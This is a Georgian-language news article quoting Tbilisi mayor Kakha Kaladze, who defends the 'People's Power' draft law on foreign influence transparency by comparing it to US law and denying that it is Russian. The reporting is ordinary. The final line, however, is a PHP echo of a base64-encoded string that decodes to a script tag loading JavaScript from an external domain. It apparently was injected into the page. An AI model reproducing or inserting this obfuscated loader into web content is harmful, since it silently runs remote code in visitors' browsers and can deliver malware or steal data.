celsiusi
ავერსი საქკაბელი

„უცნაურია, არავინ საუბრობს იმაზე, თუ მსგავსი კანონი ამერიკაში კარგად მუშაობს, ჩვენთან რატომ ვერ იმუშავებს?“, - ამის შესახებ დედაქალაქის მერმა, კახა კალაძემ საქართველოს პარლამენტში „ხალხის ძალის“ მიერ ინიცირებულ კანონპროექტზე კომენტირებისას განაცხადა.

როგორც მან ჟურნალისტებთან საუბრისას აღნიშნა, „უცხოური გავლენის გამჭვირვალეობის შესახებ“ კანონპროექტი საჭიროა იმისთვის, რომ იყოს მეტი გამჭვირვალობა და საზოგადოებამ იცოდეს, ესა თუ ის ორგანიზაცია საიდან და როგორ ფინანსდება.

„კიდევ ერთხელ ვიტყვი, რომ ამ კანონპროექტში საუბარია მხოლოდ და მხოლოდ გამჭვირვალობაზე. მთელი რიგი ქვეყნები შეგვიძლია ჩამოვთვალოთ, სადაც მსგავსი კანონი მუშაობს და პრობლემა არ შექმნილა. დარწმუნებული ვარ, საქართველოშიც არანაირი პრობლემა არ იქნება. შეგიძლიათ ნახოთ ამერიკაში მოქმედ კანონს რამხელა სიმძიმე გააჩნია და შეადაროთ იმ კანონპროექტს, რომლის მიღებასაც ჩვენთან არის საუბარი.

ბოლო დღეებში ძალიან ბევრ განცხადებას ვისმენთ, თუმცა ყველა ზედაპირულად საუბრობს. არის მცდელობა იმისა, რომ აღნიშნული კანონპროექტი შეიფუთოს, როგორც რუსული, მის სიღრმეში კი არავინ შედის - თუ მსგავსი კანონი ამერიკაში კარგად მუშაობს, ჩვენთან რატომ ვერ იმუშავებს? რატომ იქნება ჩვენთვის ცუდი? არსებობს საქართველოს არაკეთილმოსურნე ქვეყანები, რომლებიც ახორციელებენ სხვადასხვა ორგანიზაციის დაფინანსებას, რაც ხვალ და ზეგ პრობლემა შეიძლება იყოს ჩვენთვის და ასევე ევროპისთვის. ამიტომ რატომ წუხან, როცა ჩვენ ამ მიმართულებით გამჭვირვალობის აუცილებლობაზე ვსაუბრობთ? საზოგადოებამ უნდა იცოდეს ყველაფერი, თუ რომელი ორგანიზაცია საიდან და როგორ ფინანსდება. დანარჩენი მსჯელობა პარლამენტში გაგრძელდება. ამ კანონპროექტს რუსულ კანონთან კავშირი არ აქვს“, - განაცხადა მედიასთან საუბრისას თბილისის მერმა.

შეგახსენებთ, რომ საქართველოს პარლამენტში, „ქართული ოცნების“ პარტნიორმა პარტიამ „ხალხის ძალამ“ უცხოური აგენტების კანონპროქტი დაარეგისტრირა, რომლის მიხედვითაც უცხოური გავლენის აგენტებად ითვლებიან ისინი, ვინც უცხო ქვეყნის ხელისუფლების ან პოლიტიკური პარტიის ინტერესებიდან გამომდინარე ჩართული არიან საქართველოში მიმდინარე პოლიტიკურ აქტივობებში, უცხოური ძალის ინტერესებიდან გამომდინარე საქართველოში დაფინანსებული სხვადასხვა სუბიექტები და მედიასაშუალებები, რომლებიც ფინანსდებიან ან კონტროლდებიან უცხოური ძალის მიერ.

559
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");